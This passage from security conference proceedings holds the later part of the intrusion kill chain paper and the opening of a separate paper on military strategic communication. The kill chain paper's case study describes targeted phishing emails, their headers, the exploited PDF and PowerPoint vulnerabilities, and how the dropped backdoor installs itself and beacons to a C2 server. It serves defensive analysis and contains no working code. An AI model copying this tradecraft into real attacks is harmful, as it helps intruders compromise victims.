Command and Control (C2) - Typically, compromised hosts must beacon outbound to an Internet<br />
controller server to establish a C2 channel. APT malware especially requires manual interaction<br />
rather than conduct activity automatically. Once the C2 channel establishes, intruders have<br />
“hands on the keyboard” access inside the target environment.<br />
Actions on Objectives - Only now, after progressing through the first six phases, can intruders<br />
take actions to achieve their original objectives. Typically, this objective is data exfiltration which<br />
involves collecting, encrypting and extracting information from the victim environment; violations<br />
of data integrity or availability are potential objectives as well. Alternatively, the intruders may only<br />
desire access to the initial victim box for use as a hop point to compromise additional systems<br />
and move laterally inside the network.<br />
3.3 Courses of action<br />
The intrusion kill chain becomes a model for actionable intelligence when defenders align enterprise<br />
defensive capabilities to the specific processes an adversary undertakes to target that enterprise.<br />
116
Eric Hutchins et al.<br />
Defenders can measure the performance as well as the effectiveness of these actions, and plan<br />
investment roadmaps to rectify any capability gaps. Fundamentally, this approach is the essence of<br />
intelligence-driven CND: basing security decisions and measurements on a keen understanding of the<br />
adversary.<br />
Table 1 depicts a course of action matrix using the actions of detect, deny, disrupt, degrade, deceive,<br />
and destroy from DoD information operations (IO) doctrine (U.S. Department of Defense, 2006). This<br />
matrix depicts in the exploitation phase, for example, that host intrusion detection systems (HIDS) can<br />
passively detect exploits, patching denies exploitation altogether, and data execution prevention<br />
(DEP) can disrupt the exploit once it initiates. Illustrating the spectrum of capabilities defenders can<br />
employ, the matrix includes traditional systems like network intrusion detection systems (NIDS) and<br />
firewall access control lists (ACL), system hardening best practices like audit logging, but also vigilant<br />
users themselves who can detect suspicious activity.<br />
Table 1: Courses of action matrix<br />
Here, completeness equates to resiliency, which is the defender’s primary goal when faced with<br />
persistent adversaries that continually adapt their operations over time. The most notable adaptations<br />
are exploits, particularly previously undisclosed “zero-day” exploits. Security vendors call these “zeroday<br />
attacks,” and tout “zero day protection”. This myopic focus fails to appreciate that the exploit is<br />
but one change in a broader process. If intruders deploy a zero-day exploit but reuse observable tools<br />
or infrastructure in other phases, that major improvement is fruitless if the defenders have mitigations<br />
for the repeated indicators. This repetition demonstrates a defensive strategy of complete indicator<br />
utilization achieves resiliency and forces the adversary to make more difficult and comprehensive<br />
adjustments to achieve their objectives. In this way, the defender increases the adversary’s cost of<br />
executing successful intrusions.<br />
Defenders can generate metrics of this resiliency by measuring the performance and effectiveness of<br />
defensive actions against the intruders. Consider an example series of intrusion attempts from a<br />
single APT campaign that occur over a seven month timeframe, shown in Figure 2. For each phase of<br />
the kill chain, a white diamond indicates relevant, but passive, detections were in place at the time of<br />
that month’s intrusion attempt, a black diamond indicates relevant mitigations were in place, and an<br />
empty cell indicates no relevant capabilities were available. After each intrusion, analysts leverage<br />
newly revealed indicators to update their defenses, as shown by the gray arrows. The illustration<br />
shows, foremost, that at last one mitigation was in place for all three intrusion attempts, thus<br />
mitigations were successful. However, it also clearly shows significant differences in each month. In<br />
December, defenders detect the weaponization and block the delivery but uncover a brand new,<br />
117
Eric Hutchins et al.<br />
unmitigated, zero-day exploit in the process. In March, the adversary re-uses the same exploit, but<br />
evolves the weaponization technique and delivery infrastructure, circumventing detection and<br />
rendering those defensive systems ineffective. By June, the defenders updated their capabilities<br />
sufficiently to have detections and mitigations layered from weaponization to C2. By framing metrics<br />
in the context of the kill chain, defenders had the proper perspective of the relative effect of their<br />
defenses against the intrusion attempts and where there were gaps to prioritize remediation.<br />
Figure 2: Illustration of the relative effectiveness of defenses against subsequent intrusion attempts<br />
3.4 Intrusion reconstruction<br />
Kill chain analysis is a guide for analysts to understand what information is, and may be, available for<br />
defensive courses of action. It is a model to analyze the intrusions in a new way. Most detected<br />
intrusions will provide a limited set of attributes about a single phase of an intrusion. Analysts must<br />
still discover many other attributes for each phase to enumerate the maximum set of options for<br />
courses of action. Further, based on detection in a given phase, analysts can assume that prior<br />
phases of the intrusion have already executed successfully.<br />
Only through complete analysis of prior phases, as shown in Figure 3, can actions be taken at those<br />
phases to mitigate future intrusions. If one cannot reproduce the delivery phase of an intrusion, one<br />
cannot hope to act on the delivery phase of subsequent intrusions from the same adversary. The<br />
conventional incident response process initiates after our exploit phase, illustrating the self-fulfilling<br />
prophecy that defenders are inherently disadvantaged and inevitably too late. The inability to fully<br />
reconstruct all intrusion phases prioritizes tools, technologies, and processes to fill this gap.<br />
Figure 3: Late phase detection<br />
Defenders must be able to move their detection and analysis up the kill chain and more importantly to<br />
implement courses of actions across the kill chain. In order for an intrusion to be economical,<br />
adversaries must re-use tools and infrastructure. By completely understanding an intrusion, and<br />
leveraging intelligence on these tools and infrastructure, defenders force an adversary to change<br />
every phase of their intrusion in order to successfully achieve their goals in subsequent intrusions. In<br />
this way, network defenders use the persistence of adversaries’ intrusions against them to achieve a<br />
level of resilience.<br />
118
Eric Hutchins et al.<br />
Equally as important as thorough analysis of successful compromises is synthesis of unsuccessful<br />
intrusions. As defenders collect data on adversaries, they will push detection from the latter phases of<br />
the kill chain into earlier ones. Detection and prevention at pre-compromise phases also necessitates<br />
a response. Defenders must collect as much information on the mitigated intrusion as possible, so<br />
that they may synthesize what might have happened should future intrusions circumvent the currently<br />
effective protections and detections (see Figure 4). For example, if a targeted malicious email is<br />
blocked due to re-use of a known indicator, synthesis of the remaining kill chain might reveal a new<br />
exploit or backdoor contained therein. Without this knowledge, future intrusions, delivered by different<br />
means, may go undetected. If defenders implement countermeasures faster than their known<br />
adversaries evolve, they maintain a tactical advantage.<br />
Figure 4: Earlier phase detection<br />
3.5 Campaign analysis<br />
At a strategic level, analyzing multiple intrusion kill chains over time will identify commonalities and<br />
overlapping indicators. Figure 5 illustrates how highly-dimensional correlation between two intrusions<br />
through multiple kill chain phases can be identified. Through this process, defenders will recognize<br />
and define intrusion campaigns, linking together perhaps years of activity from a particular persistent<br />
threat. The most consistent indicators, the campaigns key indicators, provide centers of gravity for<br />
defenders to prioritize development and use of courses of action. Figure 6 shows how intrusions may<br />
have varying degrees of correlation, but the inflection points where indicators most frequently align<br />
identify these key indicators. These less volatile indicators can be expected to remain consistent,<br />
predicting the characteristics of future intrusions with greater confidence the more frequently they are<br />
observed. In this way, an adversary’s persistence becomes a liability which the defender can leverage<br />
to strengthen its posture.<br />
The principle goal of campaign analysis is to determine the patterns and behaviors of the intruders,<br />
their tactics, techniques, and procedures (TTP), to detect “how” they operate rather than specifically<br />
“what” they do. The defender’s objective is less to positively attribute the identity of the intruders than<br />
to evaluate their capabilities, doctrine, objectives and limitations; intruder attribution, however, may<br />
well be a side product of this level of analysis. As defenders study new intrusion activity, they will<br />
either link it to existing campaigns or perhaps identify a brand new set of behaviors of a theretofore<br />
unknown threat and track it as a new campaign. Defenders can assess their relative defensive<br />
posture on a campaign-by-campaign basis, and based on the assessed risk of each, develop<br />
strategic courses of action to cover any gaps.<br />
Another core objective of campaign analysis is to understand the intruders’ intent. To the extent that<br />
defenders can determine technologies or individuals of interest, they can begin to understand the<br />
adversary’s mission objectives. This necessitates trending intrusions over time to evaluate targeting<br />
patterns and closely examining any data exfiltrated by the intruders. Once again this analysis results<br />
in a roadmap to prioritize highly focused security measures to defend these individuals, networks or<br />
technologies.<br />
4. Case study<br />
To illustrate the benefit of these techniques, a case study observed by the Lockheed Martin Computer<br />
Incident Response Team (LM-CIRT) in March 2009 of three intrusion attempts by an adversary is<br />
considered. Through analysis of the intrusion kill chains and robust indicator maturity, network<br />
defenders successfully detected and mitigated an intrusion leveraging a “zero-day” vulnerability. All<br />
three intrusions leveraged a common APT tactic: targeted malicious email (TME) delivered to a limited<br />
set of individuals, containing a weaponized attachment that installs a backdoor which initiates<br />
outbound communications to a C2 server.<br />
119
Figure 5: Common indicators between intrusions<br />
4.1 Intrusion attempt 1<br />
Eric Hutchins et al.<br />
Figure 6: Campaign key indicators<br />
On March 3, 2009, LM-CIRT detected a suspicious attachment within an email discussing an<br />
upcoming American Institute of Aeronautics and Astronautics (AIAA) conference. The email claimed<br />
to be from an individual who legitimately worked for AIAA, and was directed to only 5 users, each of<br />
whom had received similar TME in the past. Analysts determined the malicious attachment,<br />
tcnom.pdf, would exploit a known, but unpatched, vulnerability in Adobe Acrobat Portable Document<br />
Format (PDF): CVE-2009-0658, documented by Adobe on February 19, 2009 (Adobe, 2009) but not<br />
patched until March 10, 2009. A copy of the email headers and body follow.<br />
Received: (qmail 71864 invoked by uid 60001); Tue, 03 Mar 2009 15:01:19 +0000<br />
Received: from [60.abc.xyz.215] by web53402.mail.re2.yahoo.com via HTTP; Tue,<br />
03 Mar 2009 07:01:18 -0800 (PST)<br />
Date: Tue, 03 Mar 2009 07:01:18 -0800 (PST)<br />
From: Anne E...<br />
Subject: AIAA Technical Committees<br />
To: [REDACTED]<br />
Reply-to: dn...etto@yahoo.com<br />
Message-id: <br />
MIME-version: 1.0<br />
120
Eric Hutchins et al.<br />
X-Mailer: YahooMailWebService/0.7.289.1<br />
Content-type: multipart/mixed;<br />
boundary="Boundary_(ID_Hq9CkDZSoSvBMukCRm7rsg)" X-YMail-OSG:<br />
Please submit one copy (photocopies are acceptable) of this form, and<br />
one copy of nominee’s resume to: AIAA Technical Committee<br />
Nominations,<br />
1801 Alexander Bell Drive, Reston, VA 20191. Fax number is 703/264-<br />
7551. Form can also be submitted via our web site at www.aiaa.org, Inside<br />
AIAA, Technical Committees<br />
Within the weaponized PDF were two other files, a benign PDF and a Portable Executable (PE)<br />
backdoor installation file. These files, in the process of weaponization, were encrypted using a trivial<br />
algorithm with an 8-bit key stored in the exploit shellcode. Upon opening the PDF, shellcode exploiting<br />
CVE-2009-0658 would decrypt the installation binary, place it on disk as C:\Documents and<br />
Settings\[username]\Local Settings\fssm32.exe, and invoke it. The shellcode would also extract the<br />
benign PDF and display it to the user. Analysts discovered that the benign PDF was an identical copy<br />
of one published on the AIAA website at http://www.aiaa.org/pdf/inside/tcnom.pdf, revealing adversary<br />
reconnaissance actions.<br />
The installer fssm32.exe would extract the backdoor components embedded within itself, saving EXE<br />
and HLP files as C:\Program Files\Internet Explorer\IEUpd.exe and IEXPLORE.hlp. Once active, the<br />
backdoor would send heartbeat data to the C2 server 202.abc.xyz.7 via valid HTTP requests. Table 2<br />
articulates the identified, relevant indicators per phase. Due to successful mitigations, the adversary<br />
never took actions on objectives, therefore that phase is marked “N/A.”<br />
Table 2: Intrusion attempt 1 indicators<br />
4.2 Intrusion attempt 2<br />
One day later, another TME intrusion attempt was executed. Analysts would identify substantially<br />
similar characteristics and link this and the previous day’s attempt to a common campaign, but<br />
analysts also noted a number of differences. The repeated characteristics enabled defenders to block<br />
this activity, while the new characteristics provided analysts additional intelligence to build resiliency<br />
with further detection and mitigation courses of action.<br />
Received: (qmail 97721 invoked by uid 60001); 4 Mar 2009 14:35:22 -0000<br />
121
Eric Hutchins et al.<br />
Message-ID: <br />
Received: from [216.abc.xyz.76] by web53411.mail.re2.yahoo.com via HTTP; Wed,<br />
04 Mar 2009 06:35:20 PST<br />
X-Mailer: YahooMailWebService/0.7.289.1<br />
Date: Wed, 4 Mar 2009 06:35:20 -0800 (PST)<br />
From: Anne E... <br />
Reply-To: dn...etto@yahoo.com<br />
Subject: 7th Annual U.S. Missile Defense <strong>Conference</strong><br />
To: [REDACTED]<br />
MIME-Version: 1.0<br />
Content-Type: multipart/mixed; boundary="0-760892832-1236177320=:97248"<br />
Welcome to the 7th Annual U.S. Missile Defense <strong>Conference</strong><br />
The sending email address was common to the March 3 and March 4 activity, but the subject matter,<br />
recipient list, attachment name, and most importantly, the downstream IP address (216.abc.xyz.76)<br />
differed. Analysis of the attached PDF, MDA_Prelim_2.pdf, revealed an identical weaponization<br />
encryption algorithm and key, as well as identical shellcode to exploit the same vulnerability. The PE<br />
installer in the PDF was identical to that used the previous day, and the benign PDF was once again<br />
an identical copy of a file on AIAA’s website<br />
(http://www.aiaa.org/events/missiledefense/MDA_Prelim_09.pdf). The adversary never took actions<br />
towards its objectives, therefore that phase is again marked “N/A.” A summary of indicators from the<br />
first two intrusion attempts is provided in Table 3.<br />
Table 3: Intrusion attempts 1 and 2 indicators<br />
4.3 Intrusion attempt 3<br />
Over two weeks later, on March 23, 2009, a significantly different intrusion was identified due to<br />
indicator overlap, though minimal, with Intrusions 1 and 2. This email contained a PowerPoint file<br />
which exploited a vulnerability that was not, until that moment, known to the vendor or network<br />
defenders. The vulnerability was publicly acknowledged 10 days later by Microsoft as security<br />
advisory 969136 and identified as CVE-2009-0556 (Microsoft, 2009b). Microsoft issued a patch on<br />
May 12, 2009 (Microsoft, 2009a). In this campaign, the adversary made a significant shift in using a<br />
brand new, “zero-day” exploits. Details of the email follow.<br />
Received: (qmail 62698 invoked by uid 1000); Mon, 23 Mar 2009 17:14:22 +0000<br />
122
Eric Hutchins et al.<br />
Received: (qmail 82085 invoked by uid 60001); Mon, 23 Mar 2009 17:14:21 +0000<br />
Received: from [216.abc.xyz.76] by web43406.mail.sp1.yahoo.com via HTTP; Mon,<br />
23 Mar 2009 10:14:21 -0700 (PDT)<br />
Date: Mon, 23 Mar 2009 10:14:21 -0700 (PDT)<br />
From: Ginette C... <br />
Subject: Celebrities Without Makeup<br />
To: [REDACTED]<br />
Message-id: <br />
MIME-version: 1.0<br />
X-Mailer: YahooMailClassic/5.1.20 YahooMailWebService/0.7.289.1<br />
Content-type: multipart/mixed; boundary="Boundary_(ID_DpBDtBoPTQ1DnYXw29L2Ng)"<br />
<br />
This email contained a new sending address, new recipient list, markedly different benign content<br />
displayed to the user (from “missile defense” to “celebrity makeup”), and the malicious PowerPoint<br />
attachment contained a completely new exploit. However, the adversaries used the same<br />
downstream IP address, 216.abc.xyz.76, to connect to the webmail service as they used in Intrusion<br />
2. The PowerPoint file was weaponized using the same algorithm as the previous two intrusions, but<br />
with a different 8-bit key. The PE installer and backdoor were found to be identical to the previous two<br />
intrusions. A summary of indicators from all three intrusions is provided in Table 4.<br />
Table 4: Intrusion attempts 1, 2, and 3 indicators<br />
Leveraging intelligence on adversaries at the first intrusion attempt enabled network defenders to<br />
prevent a known zero-day exploit. With each consecutive intrusion attempt, through complete<br />
analysis, more indicators were discovered. A robust set of courses of action enabled defenders to<br />
mitigate subsequent intrusions upon delivery, even when adversaries deployed a previously-unseen<br />
exploit. Further, through this diligent approach, defenders forced the adversary to avoid all mature<br />
indicators to successfully launch an intrusion from that point forward.<br />
Following conventional incident response methodology may have been effective in managing systems<br />
compromised by these intrusions in environments completely under the control of network defenders.<br />
However, this would not have mitigated the damage done by a compromised mobile asset that moved<br />
out of the protected environment. Additionally, by only focusing on post-compromise effects (those<br />
after the Exploit phase), fewer indicators are available. Simply using a different backdoor and installer<br />
would circumvent available detections and mitigations, enabling adversary success. By preventing<br />
123
Eric Hutchins et al.<br />
compromise in the first place, the resultant risk is reduced in a way unachievable through the<br />
conventional incident response process.<br />
5. Summary<br />
Intelligence-driven computer network defense is a necessity in light of advanced persistent threats. As<br />
conventional, vulnerability-focused processes are insufficient, understanding the threat itself, its<br />
intent, capability, doctrine, and patterns of operation is required to establish resilience. The intrusion<br />
kill chain provides a structure to analyze intrusions, extract indicators and drive defensive courses of<br />
actions. Furthermore, this model prioritizes investment for capability gaps, and serves as a framework<br />
to measure the effectiveness of the defenders’ actions. When defenders consider the threat<br />
component of risk to build resilience against APTs, they can turn the persistence of these actors into a<br />
liability, decreasing the adversary’s likelihood of success with each intrusion attempt.<br />
The kill chain shows an asymmetry between aggressor and defender, any one repeated component<br />
by the aggressor is a liability. Understanding the nature of repetition for given adversaries, be it out of<br />
convenience, personal preference, or ignorance, is an analysis of cost. Modeling the cost-benefit ratio<br />
to intruders is an area for additional research. When that cost-benefit is decidedly imbalanced, it is<br />
perhaps an indicator of information superiority of one group over the other. Models of information<br />
superiority may be valuable for computer network attack and exploitation doctrine development.<br />
Finally, this paper presents an intrusions kill chain model in the context of computer espionage.<br />
Intrusions may represent a broader problem class. This research may strongly overlap with other<br />
disciplines, such as IED countermeasures.<br />
References<br />
Adobe. APSA09-01: Security Updates available for Adobe Reader and Acrobat versions 9 and earlier, February<br />
2009. URL http://www.adobe.com/support/security/advisories/apsa09-01.html.<br />
Duran F, Conrad, S. H, Conrad, G. N, Duggan, D. P and Held E. B. Building A System For Insider Security. IEEE<br />
Security & Privacy, 7(6):30–38, 2009. doi: 10.1109/MSP.2009.111.<br />
Epstein, Keith, and Elgin, Ben. Network Security Breaches Plague NASA, November 2008. URL<br />
http://www.businessweek.com/print/magazine/content/08_48/b4110072404167.htm.<br />
LTC Ashton Hayes. Defending Against the Unknown: Antiterrorism and the Terrorist Planning Cycle. The<br />
Guardian, 10(1):32–36, 2008. URL http://www.jcs.mil/content/files/2009-04/041309155243_ spring2008.pdf.<br />
Krekel, Bryan. Capability of the People’s Republic of China to Conduct Cyber Warfare and Computer Network<br />
Exploitation, October 2009. URL http://www.uscc.gov/researchpapers/2009/NorthropGrumman_<br />
PRC_Cyber_Paper_FINAL_Approved%20Report_16Oct2009.pdf.<br />
Lewis, James Andrew Holistic Approaches to Cybersecurity to Enable Network Centric Operations, April 2008.<br />
URL http://armedservices.house.gov/pdfs/TUTC040108/Lewis_Testimony040108.pdf.<br />
Mandiant. M-Trends: The Advanced Persistent Threat, January 2010. URL<br />
http://www.mandiant.com/products/services/m-trends.<br />
Microsoft. Microsoft Security Bulletin MS09-017: Vulnerabilities in Microsoft Office PowerPoint Could Allow<br />
Remote Code Execution (967340), May 2009a. URL http://www.microsoft.com/technet/security/<br />
bulletin/ms09-017.mspx.<br />
Microsoft. Microsoft Security Advisory (969136): Vulnerability in Microsoft Office PowerPoint Could Allow Remote<br />
Code Execution, April 2009b. URL http://www.microsoft.com/technet/security/advisory/969136.mspx.<br />
Sarandis Mitropoulos, Dimitrios Patsosa, and Christos Douligeris. On Incident Handling and Response: A stateof-the-art<br />
approach. Computers & Security, 5:351–370, July 2006. URL<br />
http://dx.doi.org/10.1016/j.cose.2005.09.006.<br />
National Institute of Standards and Technology. Special Publication 800-61: Computer Security Incident Handling<br />
Guide, March 2008. URL http://csrc.nist.gov/publications/PubsSPs.html.<br />
National Research Council. Countering the Threat of Improvised Explosive Devices: Basic Research<br />
Opportunities (Abbreviated Version), 2007. URL http://books.nap.edu/catalog.php?record_id=11953.<br />
Sakuraba, T. Domyo, S, Chou Bin-Hui and Sakurai, K. Exploring Security Countermeasures along the Attack<br />
Sequence. In Proc. Int. Conf. Information Security and Assurance ISA 2008, pages 427–432, 2008.<br />
doi:10.1109/ISA.2008.112.<br />
Stamos, Alex. “Aurora” Response Recommendations, February 2010. URL https://www.isecpartners.<br />
com/files/iSEC_Aurora_Response_Recommendations.pdf.<br />
Tirpak, John A.. Find, Fix, Track, Target, Engage, Assess. Air Force Magazine, 83:24–29, 2000. URL<br />
http://www.airforce-magazine.com/MagazineArchive/Pages/2000/July%202000/0700find.aspx.<br />
UK-NISCC. National Infrastructure Security Co-ordination Centre: Targeted Trojan Email Attacks, June 2005.<br />
URL https://www.cpni.gov.uk/docs/ttea.pdf.<br />
United States Army Training and Doctrine Command. A Military Guide to Terrorism in the Twenty-First Century,<br />
August 2007. URL http://www.dtic.mil/srch/doc?collection=t3&id=ADA472623.<br />
US-CERT. Technical Cyber Security Alert TA05-189A: Targeted Trojan Email Attacks, July 2005. URL<br />
http://www.us-cert.gov/cas/techalerts/TA05-189A.html.<br />
124
Eric Hutchins et al.<br />
U.S.-China Economic and Security Review Commission. 2008 Report to Congress of the U.S. China Economic<br />
and Security Review Commission, November 2008. URL http://www.uscc.gov/annual_report/2008/<br />
annual_report_full_08.pdf.<br />
U.S.-China Economic and Security Review Commission. 2009 Report to Congress of the U.S.-China Economic<br />
and Security Review Commission, November 2009. URL http://www.uscc.gov/annual_report/2009/<br />
annual_report_full_09.pdf.<br />
U.S. Department of Defense. Joint Publication 3-13 Information Operations, February 2006. URL<br />
http://www.dtic.mil/doctrine/new_pubs/jp3_13.pdf.<br />
U.S. Department of Defense. Joint Publication 3-60 Joint Targeting, April 2007. URL http://www.dtic.<br />
mil/doctrine/new_pubs/jp3_60.pdf.<br />
Willison, Robert and Siponen. Mikko Overcoming the insider: reducing employee computer crime through<br />
Situational Crime Prevention. Communications of the ACM, 52(9):133–137, 2009. doi: http://doi.acm.<br />
org/10.1145/1562164.1562198.<br />
125
The Hidden Grand Narrative of Western Military Policy: A<br />
Linguistic Analysis of American Strategic Communication<br />
Saara Jantunen and Aki-Mauri Huhtinen<br />
National Defence University, Helsinki, Finland<br />
sijantunen@gmail.com<br />
aki.huhtinen@mil.fi<br />
Abstract: War engages civilians in a very different way than is traditionally understood. The military-industrial<br />
complex has rooted itself permanently into the civilian world. In the US, recruiters have long operated in<br />
university campuses, the Pentagon has funded the entertainment industry for decades, and the current trend in<br />
most militaries is to advertise military careers that are less about war and more about individual expertise in<br />
civilian professions. The key place for military recruiting is shopping malls, where teenagers can play war games<br />
and enlist. Strategic communication has replaced information warfare. In a complex world, strategic<br />
communication exploits all possible media. As Art of War has been replaced by science, the representations of<br />
war and the role of the military have changed. Both war and military forces are now associated with binary roles:<br />
destruction and humanity, killing and liberating. The logic behind 'bombing for peace' is encoded in the Grand<br />
Military Narrative. This narrative is hidden in American (and NATO) strategies such as Effects Based Operations,<br />
which rely heavily on technology. As people aim to rationalize the world with technology, they fail to take into<br />
account the uncertainty it brings. In warfare, that uncertainty is verbalized as “friendly fire”, “collateral damage” or<br />
simply as “accident”. Success and failure are up to technology. Technology is no longer a tool, but an ideology<br />
and an actor that not only 'enables' the military to take action, but frees it of responsibility. This article analyzes<br />
American strategy discourse and the standard and trends of rhetoric they create. The article focuses on<br />
pinpointing some of the linguistic choices and discourses that define the so-called 'techno-speak', the product of<br />
modern techno-ideology. These discourses result in representations of techno-centered binary values, which<br />
steer military strategy and foreign policy.<br />
Keywords: military-industrial complex, revolution in military affairs, effects based operations, discourse analysis,<br />
military technology<br />
1. The grand military narrative<br />
"You want to hit only the guy you want, not the school bus three cars back", says Steve Felix of the<br />
Naval Air Warfare Center (Matthews, 2010). "The bad guys are figuring out how to hide out in homes<br />
and near schools. We can't go in and drop large bombs - that just doesn't work any more", explains<br />
Steve Martin, the representative of Lockheed Martin. Raytheon's Griffin, currently deployed in<br />
Predator drones, is a new, lighter and more precise missile type. "The Griffin's maneuverability and<br />
accuracy reduce the risk of "collateral damage"' says an Army representative. "When you can start<br />
producing a lower ratio of collateral damage, that's how you win this kind of war", notes Anthony<br />
Cordesman from Strategy at the Center for Strategic and International Studies (Wichner, 2010). No<br />
more 'enemy', but virtuous precision to rid the world of the "bad guys".<br />
In July 2010, the Army Experience Center (AEC) in a Philadelphia mall was getting ready to close its<br />
door after a successful project. The Center offered visitors information on military careers as well as<br />
video games and simulators (some of which are used to train the troops). The traditional images of<br />
depressing boot camp physical training disappear once the teenagers (13 and older, according to the<br />
AEC) get to show with combat simulators what they have been practicing most of their lives. The<br />
youth, wandering the malls, are the perfect target for recruiters. Because they know gaming, warfare<br />
has to become game-like. Now, entertainment industry is replacing boot camps. Being good at war is<br />
made easy. Being good at war is about pressing a button: In the Army Experience Center, the<br />
teenagers can "touch and feel and experience what the army is all about", explains one of the<br />
Center's recruiters (thearmyexperience, 2008). High-tech weapons to kill the "bad guys" from a<br />
comfortable distance and virtual simulation create combat experience: What ever the problem, the<br />
answer lies in technology. This is the Grand Military Narrative.<br />
2. The military-industrial-complex and revolution in military affairs<br />
The military-industrial complex gave birth to the Revolution in Military Affairs. The future of the military<br />
is computers, information networks, and precision-guided munitions (Toffler, 1981, 1993).<br />
Technological advances are used to solve the military and strategic challenges of the U.S. (Shimko,<br />
2010: 213). This revolution, or evolution, is depicted by the Grand Military Narrative.<br />
126
Saara Jantunen and Aki-Mauri Huhtinen<br />
RMA's focus on technology has led to technology-centered strategies and doctrines. Technology<br />
offers the option of unmanned war, to “bring knowledge forward” for the people whose observation is<br />
limited (Rantapelkonen, 2006:72). “Maximizing output” and “minimizing input” (citing Lyotard, 1984 in<br />
Rantapelkonen, 2006:73) match the American ideal of “easy living”. Lyotard argues that technology is<br />
“good” because it is efficient, not because it is “true”, “just” or “beautiful”.<br />
According to Rantapelkonen (2006), 'war on terror' is technologically driven. However, the binary<br />
image of war contains the idea of not only destroying and devastating, but also avoiding risk, threat<br />
and death by liberating, helping and building. Der Derian (2008) calls this "virtuous war". He argues<br />
that the military-industrial complex needs binary rhetoric such as 'bombing for peace' and 'killing to<br />
live' in order to operate and make profit: Technology is in service of virtue. As death and destruction<br />
are no longer accepted, technology steps in. By replacing the soldier with a precision (fire-and-forget)<br />
weapon, 'targets can be hit' and 'operations conducted' without causing protests on the home front.<br />
The evolution of warfare demands science is in the service of war. Technology “enables us to do a lot<br />
more stuff” and to “more effectively prosecute those operations” (U.S. Department of Defense, 2003).<br />
Because of its efficiency and speed, strategies, doctrines and even foreign policy rely on the sole use<br />
of technology. The Powell Doctrine aimed to solve problems by overwhelming force in the form of<br />
superior weapons technology. Shock and Awe in 2003 worked much the same way.<br />
However, the modern narratives and threat descriptions do not, after all, change much. President<br />
Obama no longer uses the term "war on terrorism", but this choice of term did not change the warfare<br />
in Afghanistan or Iraq. The US, China, Russia, India, Pakistan, Israel and North Korea are still<br />
developing nuclear weapons. The new threat descriptions have not removed the old threats. Despite<br />
precision munitions, B52 bombers are still in use. The real change first takes place in discourse, but<br />
lags behind in realization.<br />
The Grand Military Narrative contains a techno-ideology, which is encoded in language. In this<br />
Narrative war has two aspects: the "how" and "why". How wars are conducted is a matter of<br />
technology descriptions. Why wars are fought is a matter of value systems. The merge of these two<br />
aspects create what is now known as strategic communication.<br />
3. From information warfare to strategic communication<br />
Not only has the language of the press-briefings, but also soldier-to-soldier communication changed.<br />
In the battle field and combat, propaganda has been replaced by strategic and psychological<br />
influence. The global and social media create an increasing influence and new technology solutions<br />
create an opportunity to make an impact. Strategic communication exploits all these.<br />
The new generation's war, the Gulf War, was a catalyst to public discussion on the new wave of<br />
Information Operations. The Kosovo War and 9/11 sped up the discussion. A whole new narrative<br />
was created during the 'War Against Terrorism'.<br />
According to Taylor (2003), the concepts of political, psychological or information warfare are<br />
outdated. Instead, we use the concept of 'strategic communication'. Taylor recognizes three types of<br />
it. First is “public diplomacy”, referring to state and political level. Second is “public affairs”, which<br />
contains the global media. The third type, Information operations (Info Ops), deals with military<br />
capability. Strategic communication has abandoned the Cold War era categories of propaganda: the<br />
so called “black” (covert), “white” (overt) and “grey” (unknown) propaganda. Today, the speed of<br />
communication is enough to disturb our perception management capability. The 24/7 model takes<br />
advantage of our values and understanding of democracy: we say no to censorship and want all<br />
information to be available at all times, everywhere.<br />
Strategic communication is a child of the complex world. Instead of rational knowledge, we have<br />
information flow. Planning and execution are parallel processes; Speed dictates the operational<br />
modes, and strategic communication is an attempt to control all this.<br />
4. The question of responsibility: Effects Based Operations<br />
Effects Based Operations (EBO), is a US military concept and doctrine that stands for "operations that<br />
are planned, executed, assessed, and adapted based on a holistic understanding of the operational<br />
environment in order to influence or change system behaviour or capabilities using the integrated<br />
127
Saara Jantunen and Aki-Mauri Huhtinen<br />
application of select instruments of power to achieve directed policy aims". On the day of "Shock and<br />
Awe" in 2003, Colonel Gary L. Crowder, chief of strategy, concepts and doctrine, elaborated the<br />
concept in layperson's terms in a press briefing dedicated for EBO alone (U.S. Department of<br />
Defense, 2003). Before proceeding to explaining any further, the concepts of technology-based<br />
approach and doctrine step in. Crowder explains that the new approach was "more than just people, it<br />
was the combination of a fortuitous development of different capabilities and technologies [...] that<br />
enabled us to do that." The phrases that follow this capture the very essence of the discourse that<br />
characterized the American Public Relations during the beginning of the war:<br />
[...] what we wanted to do was in fact to achieve some sort of policy objective, and that<br />
you could, in fact, craft military operations to better achieve those policy operations in a<br />
more efficient and effective manner.<br />
The key words here are "efficient" and "effective". EBO was, according to Crowder, a way to mitigate<br />
collateral damage. In order to explain the concepts of "collateral damage" and "unintended damage",<br />
Crowder had to discuss risk-taking as part of doctrine.<br />
Crowder explains that even if collateral and unintended damage happen, and "both of these types of<br />
damage will take place", they "still went through a methodical process". This precisely is the problem<br />
with strategy that relies almost solely on the performance of technology. Technology fails, and when it<br />
does, the responsibility of that failure lies on technology itself. According to the strategy, both<br />
collateral and unintended damage are unavoidable, technology has its fail-ratio, and these are facts<br />
that just have to be accepted. In Virilio's (1989: 8-9) terms, Art of War has turned into Science of the<br />
Accident.<br />
Technology is complex and when techno-speak enters press-briefings such as Crowder's, a new kind<br />
of language is created. Zizek (2009) argues that public communication increasingly applies expert<br />
and scientific jargon that no longer translates to the 'common speak' of the society. The 'expert<br />
speak', despite its abstract nature, still shapes our thinking, especially when it is labeled with<br />
adjectives such as 'precision', 'smart' and 'efficiency'. With examples of virtuous warring (liberating)<br />
and precise and efficient operating models (avoiding collateral damage), it complies with the modern<br />
imperative of clean and safe, effective and lethal, and yet moral and humane war fighting. The kind of<br />
war that we will accept.<br />
Although EBO as it was first created and intended is already abandoned by the American Department<br />
of Defense, it created a new narrative tradition of virtue and the superiority of technology and binary<br />
values. This tradition continues to influence Western military discourses. This will be discussed in<br />
Chapter 5.<br />
5. The grand military narrative: Analysis<br />
In order to pinpoint the Grand Military Narrative of strategic communication, we have to look at the<br />
theme and structures of the strategists' language. The United States has an irrefutable position as the<br />
military trend-setter and the creator of new military concepts. This makes American strategy papers<br />
and press briefings on strategy and doctrine a good resource for analyzing the evolution of strategic<br />
communication. The upcoming sections continue the discussion on strategy, doctrine and Effects<br />
Based Operations and their influence on discourse.<br />
The Joint Operating Environment 2010 (JOE10) (United States Joint Forces Command, 2010)<br />
provides the framework for our analysis and aims to predict and forecast the future of American<br />
warfare. It argues and elaborates on what should be prepared for. The narrative starts from the<br />
recognition of the human limitations in the complex world, created by the clash of different ideologies<br />
and cultures, and further supplemented by advances in technology and changes in the economy.<br />
The complex world affects, according to the report, the "battle of narratives". If winning the battle is<br />
